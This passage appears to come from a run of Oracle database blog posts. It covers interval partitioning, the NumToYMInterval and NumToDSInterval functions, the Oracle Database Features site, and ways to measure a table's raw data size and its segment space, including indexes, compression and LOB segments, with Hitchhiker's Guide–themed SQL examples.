SEASON_END_DATE                COMPETITION      FINISHING_POSITION
------------------------------ ---------------- ------------------
01-JUN-2019                    League 1                          1

1 row selected.

Interval Partitioning Clairvoyance
Now, you’re probably thinking that Interval partitioning will ensure that your table is equi-partitioned in terms of time periods, provided the value of the partition key is inserted sequentially.
But what happens if you enter dates out-of-sequence ?
For example :
insert into luton_seasons
(
season_end_date,
competition,
games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points,
finishing_position, notes
)
values
(
to_date('01-JUN-2025', 'DD-MON-YYYY'),
'Premier League',
38, 38, 0, 0, 112, 7, 114,
1, 'Clean sweep of trophies and a perfect season in one go !'
);
insert into luton_seasons
(
season_end_date,
competition,
games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points,
finishing_position, notes
)
values
(
to_date('01-JUN-2024', 'DD-MON-YYYY'),
'Premier League',
38, 20, 10, 8, 64, 40, 70,
4, 'Champions League here we come !'
);
commit;
Now, you might think that Oracle would create the partition for values less than 01-JUL-2025 on the creation of the first record and then assign the second record to that partition as it already exists.
However, it’s actually smart enough to create the “missing” partition for the second insert :
select season_end_date, competition, finishing_position
from luton_seasons partition for (to_date ('01-JUN-2024', 'DD-MON-YYYY'))
order by 1;
SEASON_END_DATE COMPETITION FINISHING_POSITION
------------------------------ ------------------- ------------------
01-JUN-2024 Premier League 4
1 row selected.
We can see that the table’s last partition by position has a lower system-generated number in its name than its predecessor, indicating that it was created first :
select partition_name, partition_position, high_value
from user_tab_partitions
where table_name = 'LUTON_SEASONS'
order by partition_position;
The Interval Functions
There are two functions that you can use when specifying an interval for your partitions :
- NumToYMInterval
- NumToDSInterval
Despite the camel-case formatting of these function names, they are in fact case-insensitive when used in SQL or PL/SQL.
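To see where these functions fit in, here’s a minimal sketch of an interval-partitioned table definition ( the table and column names are made up for illustration ) :
create table match_results
(
    fixture_date date not null,
    home_team    varchar2(100),
    away_team    varchar2(100),
    home_goals   number,
    away_goals   number
)
partition by range (fixture_date)
-- one new partition per year, created automatically as rows arrive
interval (numtoyminterval(1, 'YEAR'))
(
    -- at least one partition must be specified explicitly
    partition fixtures_2023 values less than (to_date('01-JAN-2024', 'DD-MON-YYYY'))
);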
NumToYMInterval lets you specify an interval in either ‘YEARS’ or ‘MONTHS’ :
select to_date('29-FEB-2020', 'DD-MON-YYYY') + numtoyminterval(4, 'year') as next_leap_year_day
from dual;
NEXT_LEAP_YEAR_DAY
------------------------------
29-FEB-2024
select to_date('01-JUL-2023', 'DD-MON-YYYY') + numtoyminterval(3, 'month') as start_q4_2023
from dual;
START_Q4_2023
------------------------------
01-OCT-2023
NumToDSInterval
NumToDSInterval allows you to specify more granular intervals, i.e. :
- DAY
- HOUR
- MINUTE
- SECOND
How long is a football match ?
select numToDSInterval(5400, 'second') as match_length
from dual;
select numtodsinterval(90, 'minute') as match_length
from dual;
select numToDSInterval(1.5, 'hour') as match_length
from dual;
select numtodsinterval(1.5/24, 'day') as match_length
from dual;
Each of these queries returns :
MATCH_LENGTH
------------------------------
+00 01:30:00.000000
Note that I’ve included the FROM clause in the above queries because, until the full 23c release sees the light of day, we’ll still need to use it in the day job.
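Incidentally, once you do get your hands on 23c, the FROM clause becomes optional for simple expression queries like these, so something along the following lines should work ( untested here, as I’m still on 19c ) :
-- 23c onward : no need to select from DUAL for a simple expression
select numtodsinterval(90, 'minute') as match_length;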
Whatever you’re planning to do to pass the time until …
alter session set nls_date_format='DD-MON-YYYY HH24:MI';
select
to_date('12-AUG-2023', 'DD-MON-YYYY') + numtodsinterval(15, 'hour') as kick_off
from dual;
…using interval partitioning means that it should involve less manual partition creation.
The Oracle Database Features Site – reducing Oracle Documentation Drudgery
If there’s one thing Teddy approves of, it’s eating your own Dog Food…although he does appreciate the value of a varied diet…
Some nameless heroes in the Oracle Documentation Team seem to agree and have produced a publicly available APEX application which allows you to search:
- the features available in each successive Oracle release
- the various licensing options and packs available with each Edition
Time to head on over to the Oracle Database Features site and take a closer look…
Features
I’ve heard a fair bit about schema only accounts. I wonder when they came along ?
It looks like they have been around since 18c with further enhancements in later releases.
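As an aside, a schema-only account is one created without a password, purely to own objects. A minimal sketch ( hypothetical user name – check the syntax against the documentation for your version ) :
-- 18c onward : a passwordless account that exists only to own application objects
create user hr_app_owner no authentication;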
If I want details on a particular listing, I can just click on the title :
As you can see, there’s also a link to the relevant documentation.
It’s also possible to do a less specific search. For example, if I’m looking to upgrade from 11.2 to 19c and I want to see all of the new features in all of the intermediate releases :
The application also allows you to focus on areas of interest.
For example, if I want to see what’s new in 21c as far as Analytic Functions are concerned, I can choose Data Warehousing/Big Data as my focus area and then further refine my search by specifying Analytic Functions as the Sub Area of Interest.
Together with checking 21c as the Version and that I’m interested in New features only, the Application returns this :
It’s worth noting that the information in this application is based on the New Features documentation for the respective Oracle versions. Therefore, whilst you’ll find an entry for the VALIDATE_CONVERSION SQL function, introduced in 12.1…
Licensing
Selecting the Licensing tab reveals functionality for navigating the often complex area of Oracle Licensing.
For example, if we want to find out which Editions Partitioning is available on :
Once again, further details are available by clicking on the title of a result row :
The Oracle Database Features site is a welcome augmentation to the existing documentation.
Its categorised and searchable content offers the potential for significant savings in time and effort, especially when you’re preparing to move between Oracle versions.
The Ultimate Question of Life, the Universe, and… how big is my Oracle Table ?
At a time when the debate rages about how much you should trust what AI tells you, it’s probably worth recalling Deep Thought’s wildly incorrect assertion that the answer to the Ultimate Question of Life, the Universe, and Everything is forty-two.
As any Database specialist will know, the answer is the same as it is to the question “How big is my Oracle Table ?” which is, of course, “It depends”.
What it depends on is whether you want to know the volume of data held in the table, or the amount of space the database is using to store the table and any associated segments (e.g. indexes).
Connecting to my trusty Free Tier OCI Oracle Instance ( running 19c Enterprise Edition), I’ve set out on my journey through (disk) space to see if I can find some more definitive answers…
How big is my table in terms of the raw data stored in it ?
Before going any further, I should be clear on the database language settings and character set being used in the examples that follow. Note particularly that, although the character set is AL32UTF8, all of the sample data that follows uses single-byte characters :
select parameter, value
from gv$nls_parameters
order by parameter
/

PARAMETER                      VALUE
------------------------------ ------------------------------
NLS_CALENDAR                   GREGORIAN
NLS_CHARACTERSET               AL32UTF8
NLS_COMP                       BINARY
NLS_CURRENCY                   £
NLS_DATE_FORMAT                DD-MON-YYYY
NLS_DATE_LANGUAGE              ENGLISH
NLS_DUAL_CURRENCY              €
NLS_ISO_CURRENCY               UNITED KINGDOM
NLS_LANGUAGE                   ENGLISH
NLS_LENGTH_SEMANTICS           BYTE
NLS_NCHAR_CHARACTERSET         AL16UTF16
NLS_NCHAR_CONV_EXCP            FALSE
NLS_NUMERIC_CHARACTERS         .,
NLS_SORT                       BINARY
NLS_TERRITORY                  UNITED KINGDOM
NLS_TIMESTAMP_FORMAT           DD-MON-RR HH24.MI.SSXFF
NLS_TIMESTAMP_TZ_FORMAT        DD-MON-RR HH24.MI.SSXFF TZR
NLS_TIME_FORMAT                HH24.MI.SSXFF
NLS_TIME_TZ_FORMAT             HH24.MI.SSXFF TZR

19 rows selected.
Now, let’s see if we can work out how much raw data is held in a table.
We’ll start with a very simple example :
create table marvin as
select 1000 + rownum as id
from dual
connect by rownum <= 1024;
Marvin may have a brain the size of a planet but his tabular namesake has more modest space requirements.
Its 1024 records are all 4 digits long.
Therefore, the size of the table data should be 4096 bytes, right ?
“Hang on”, you’re thinking, “why not just look up the size in USER_SEGMENTS and make this a really short post ?”
Well :
select bytes
from user_segments
where segment_name = 'MARVIN'
and segment_type = 'TABLE'
/

     BYTES
----------
     65536
USER_SEGMENTS will give you a size in bytes, but it’s not the same as the amount of raw data.
We’ll come back to this in a bit.
For now though, we can cross-check the size from elsewhere in the data dictionary, provided the stats on the table are up-to-date.
To ensure that this is so, I can run :
exec dbms_stats.gather_table_stats('MIKE', 'MARVIN');
This populates the statistics columns in the USER_TABLES view, which means that we can estimate the data volume by running the following query :
select num_rows, avg_row_len,
num_rows * avg_row_len as data_in_bytes
from user_tables
where table_name = 'MARVIN'
/
…which returns…
  NUM_ROWS AVG_ROW_LEN DATA_IN_BYTES
---------- ----------- -------------
      1024           4          4096
That looks promising.
We can further verify this by running :
select sum(length(id)) as data_in_bytes
from marvin
/

DATA_IN_BYTES
-------------
         4096
OK, now let’s see what happens with a slightly more complex data set, and an index as well …
create table hitchikers
(
id number generated always as identity,
character_name varchar2(250),
quote varchar2(4000),
constraint hitchikers_pk primary key (id)
)
/
declare
procedure ins( i_character in varchar2, i_quote in varchar2)
is
begin
insert into hitchikers( character_name, quote)
values(i_character, i_quote);
end;
begin
for i in 1..1024 loop
ins('Deep Thought', 'Forty-Two');
ins('Trillian', q'[we have normality... anything you can't cope with is, therefore, your own problem]');
ins('Ford Prefect', 'Time is an illusion. Lunchtime doubly so.');
ins('Zaphod Beeblebrox', q'[If there's anything more important than my ego around, I want it caught and shot right now!]');
ins(null, 'Anyone who is capable of getting themselves made President should on no account be allowed to do the job');
ins('Marvin', q'[Life! Loathe it or hate it, you can't ignore it.]');
ins('Arthur Dent', 'This must be Thursday. I never could get the hang of Thursdays');
ins('Slartibartfast', q'[I'd rather be happy than right any day]');
end loop;
commit;
end;
/
commit;
Once stats are present on the table, we can check the expected data size as before :
select num_rows, avg_row_len,
    num_rows * avg_row_len as data_in_bytes
from user_tables
where table_name = 'HITCHIKERS'
/

  NUM_ROWS AVG_ROW_LEN DATA_IN_BYTES
---------- ----------- -------------
      8192          75        614400
This time, the size in bytes figure we get back is not exact, as we can confirm with :
select sum( length(id) + nvl(length(character_name),0) + nvl(length(quote), 0)) as data_in_bytes
from hitchikers
/

DATA_IN_BYTES
-------------
       598957
To verify the actual size in bytes, we can dump the contents of a table into a csv file. In this case, I’m using SQLDeveloper :
The resulting file is a different size again :
ls -l hitchikers.csv

-rw-rw-r-- 1 mike mike 656331 May 13 11:50 hitchikers.csv
This can be accounted for by the characters added as part of the csv formatting.
First, the csv file includes a header row :
head -1 hitchikers.csv

"ID","CHARACTER_NAME","QUOTE"
Including the line terminator this is 30 bytes :
head -1 hitchikers.csv |wc -c
30
The format in each of the 8192 data rows includes :
- a comma after all but the last attribute on a row
- a line terminator after the last attribute
- double quotes enclosing each of the two VARCHAR attributes.
For example :
grep ^42, hitchikers.csv
42,"Trillian","we have normality... anything you can't cope with is, therefore, your own problem"
That’s a total of 7 extra bytes per data row – two commas, four double quotes and a line terminator.
Add all that up ( 8192 rows x 7 bytes, plus the 30-byte header row) and it comes to 57374 bytes which are a consequence of csv formatting.
Subtract that from the file size and we get back to the calculated data size we started with :
656331 - 57374 = 598957
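If you’d rather let the database do the arithmetic, the same check can be expressed as a quick query ( the literals are just the figures gathered above ) :
select
    (8192 * 7) + 30 as csv_overhead_bytes,
    656331 - ((8192 * 7) + 30) as raw_data_bytes
from dual;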
This confirms that the figures in USER_TABLES are approximate and you’ll need to bear this in mind if you’re relying on them to calculate the size of the data in a table.
Whilst we’re here, let’s see what effect compression might have on our ability to determine the raw data size.
We can do this by creating a table that has the same structure as HITCHIKERS and contains the same data, but which is compressed :
create table magrathea
(
id number,
character_name varchar2(250),
quote varchar2(4000),
constraint magrathea_pk primary key (id)
)
row store compress advanced
/
insert into magrathea( id, character_name, quote)
select id, character_name, quote
from hitchikers
/
commit;
exec dbms_stats.gather_table_stats(user, 'MAGRATHEA');
It turns out that, for the purposes of our raw data calculation, the effect of table compression is…none at all :
select num_rows, avg_row_len, num_rows * avg_row_len
from user_tables
where table_name = 'MAGRATHEA'
/

  NUM_ROWS AVG_ROW_LEN NUM_ROWS*AVG_ROW_LEN
---------- ----------- --------------------
      8192          75               614400
However, if you look at the number of blocks used to store the table, the effects of compression are more evident :
select table_name, blocks
from user_tables
where table_name in ('HITCHIKERS', 'MAGRATHEA')
order by 2
/

TABLE_NAME                         BLOCKS
------------------------------ ----------
MAGRATHEA                              20
HITCHIKERS                             95
Incidentally, it’s worth noting that, as with the data size, the number of blocks reported in USER_TABLES is somewhat approximate.
USER_SEGMENTS reports the number of blocks for each table as :
select segment_name, blocks
from user_segments
where segment_name in ('HITCHIKERS', 'MAGRATHEA')
order by 2
/

SEGMENT_NAME                       BLOCKS
------------------------------ ----------
MAGRATHEA                              24
HITCHIKERS                            104
So it looks like compression will affect the amount of database space required to store an object but not the size of the actual data. This brings us nicely on to…
How big is my table in terms of the amount of space it’s taking up in the database ?
Let’s go back to MARVIN. Remember, this table contains 4K of raw data, but USER_SEGMENTS claims that it’s quite a bit larger :
select bytes
from user_segments
where segment_name = 'MARVIN'
and segment_type = 'TABLE'
/

     BYTES
----------
     65536
To understand how Oracle has come up with this figure, you need to consider that :
- the smallest unit of space that Oracle addresses is measured in blocks
- the size of these blocks is defined at tablespace level.
- any object that uses space is allocated that space in units of an extent – which is a number of contiguous blocks.
If we take a look at MARVIN, we can see that the table resides in the DATA tablespace and has been allocated a single extent of 8 blocks :
select tablespace_name, bytes, blocks, extents
from user_segments
where segment_name = 'MARVIN';

TABLESPACE_NAME                     BYTES     BLOCKS    EXTENTS
------------------------------ ---------- ---------- ----------
DATA                                65536          8          1
The block size is defined at the tablespace level and is held in USER_TABLESPACES in bytes :
select block_size
from user_tablespaces
where tablespace_name = 'DATA';

BLOCK_SIZE
----------
      8192
If we now multiply the number of blocks in the table by the size of those blocks, we get back to the size that USER_SEGMENTS is reporting :
select seg.blocks * tsp.block_size
from user_segments seg
inner join user_tablespaces tsp
    on seg.tablespace_name = tsp.tablespace_name
where seg.segment_name = 'MARVIN';

SEG.BLOCKS*TSP.BLOCK_SIZE
-------------------------
                    65536
MARVIN is a table with no ancillary segments, such as indexes.
To find the total space being used for the HITCHIKERS table, we’ll also need to consider the space being taken up by its index, HITCHIKERS_PK :
select seg.segment_name, seg.segment_type, seg.blocks, ts.block_size, seg.bytes
from user_segments seg
inner join user_tablespaces ts
    on ts.tablespace_name = seg.tablespace_name
where seg.segment_name in ('HITCHIKERS', 'HITCHIKERS_PK')
/

SEGMENT_NAME         SEGMENT_TYPE        BLOCKS BLOCK_SIZE      BYTES
-------------------- --------------- ---------- ---------- ----------
HITCHIKERS           TABLE                  104       8192     851968
HITCHIKERS_PK        INDEX                   24       8192     196608
…in other words…
select sum(seg.bytes)
from user_segments seg
where seg.segment_name in ('HITCHIKERS', 'HITCHIKERS_PK')
/

SUM(SEG.BYTES)
--------------
       1048576
On the subject of ancillary segments, what about LOBS ?
create table the_guide(
id number generated always as identity,
message clob);
declare
v_msg clob;
begin
for i in 1..1000 loop
v_msg := v_msg||q'[Don't Panic!]';
end loop;
insert into the_guide(message) values( v_msg);
end;
/
commit;
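Before totting up the space, it’s worth seeing which segments Oracle has created to support the CLOB. A quick look at USER_LOBS should show the mapping between the table, the LOBSEGMENT and its LOBINDEX ( the column selection here is just a suggestion ) :
select table_name, column_name, segment_name, index_name
from user_lobs
where table_name = 'THE_GUIDE';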
Unlike other segment types, LOBSEGMENT and LOBINDEX segments do not have their parent tables listed as the SEGMENT_NAME in USER_SEGMENTS.
Therefore, we need to look in USER_LOBS to identify the parent table of a LOBSEGMENT, and in USER_INDEXES for a LOBINDEX :
select segment_name, segment_type, bytes, blocks
from user_segments
where
(
    segment_name = 'THE_GUIDE'
    or segment_name in
    (
        select segment_name
        from user_lobs
        where table_name = 'THE_GUIDE'
    )
    or segment_name in
    (
        select index_name
        from user_indexes
        where table_name = 'THE_GUIDE'
    )
)
/

SEGMENT_NAME                   SEGMENT_TYPE         BYTES     BLOCKS
------------------------------ --------------- ---------- ----------
THE_GUIDE                      TABLE                65536          8
SYS_IL0000145509C00002$$       LOBINDEX             65536          8
SYS_LOB0000145509C00002$$      LOBSEGMENT         1245184        152
In this instance, although the table segment itself is only taking up 65536 bytes, when you add in all of the supporting objects, the total space requirement increases to 1376256 bytes.
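If you just want that total in a single figure, a variation on the previous query should do the trick :
select sum(bytes) as total_bytes
from user_segments
where segment_name = 'THE_GUIDE'
or segment_name in
(
    select segment_name
    from user_lobs
    where table_name = 'THE_GUIDE'
)
or segment_name in
(
    select index_name
    from user_indexes
    where table_name = 'THE_GUIDE'
);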
If you’ve managed to make it this far then meet me at the Big Bang Burger Bar for a Pan Galactic Gargle Blaster. I need a drink after that.